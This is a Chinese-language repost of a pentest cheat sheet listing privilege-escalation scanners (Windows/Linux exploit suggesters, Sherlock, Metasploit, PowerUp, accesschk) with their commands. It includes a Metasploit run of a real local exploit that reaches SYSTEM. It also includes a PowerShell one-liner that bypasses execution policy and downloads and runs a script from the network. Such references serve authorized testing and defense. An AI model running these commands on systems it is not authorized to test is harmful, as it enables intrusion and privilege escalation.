提权扫描Tools汇总(附下载)

admin 2022年11月26日22:19:40评论75 views字数 1332阅读4分26秒阅读模式

使用Windows-Exploit-Suggester解析systeminfo

https://github.com/AonCyberLabs/Windows-Exploit-Suggester


./windows-exploit-suggester.py

使用Linux-Exploit-Suggester.sh寻找linux提权问题

https://github.com/mzet-/linux-exploit-suggester

./linux-exploit-suggester.sh

使用Sherlock

https://github.com/rasta-mouse/Sherlock

Import-Module Sherlock.ps1
Find-AllVulns

使用msf查询补丁和可利用提权漏洞


# 查询补丁
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010

# 查询Exp
msf> use post/multi/recon/local_exploit_suggester
msf> set LHOST <攻击机IP>
msf> set SESSION <session_id>
msf> run

# 利用示例
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> run
meterpreter> getuid
Server username: NT AUTHORITYSYSTEM

使用powerup检查提权漏洞

powershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -nop -exec bypass -c "IEX (New-object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

使用accesschk.exe对系统扫描发现高权限可执行程序,且能够被低权限用户更改


accesschk "d:dir"
查看所有用户在ddir路径的子路径的权限

accesschk "Administrator "d:dir"
查看Administrator用户在ddir路径的子路径的权限

accesschk Administrators -c *
查看Administrators组对所有服务的权限

accesschk -k Guest hklmsoftware
查看Guest用户对hklmsoftware注册表的权限

accesschk -ou User
查看User用户对全局对象的权限


作者:Leticia's Blog ,详情点击阅读原文。


原文始发于微信公众号(渗透Xiao白帽):提权扫描Tools汇总(附下载)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月26日22:19:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   提权扫描Tools汇总(附下载)https://cn-sec.com/archives/1418567.html

发表评论

匿名网友 填写信息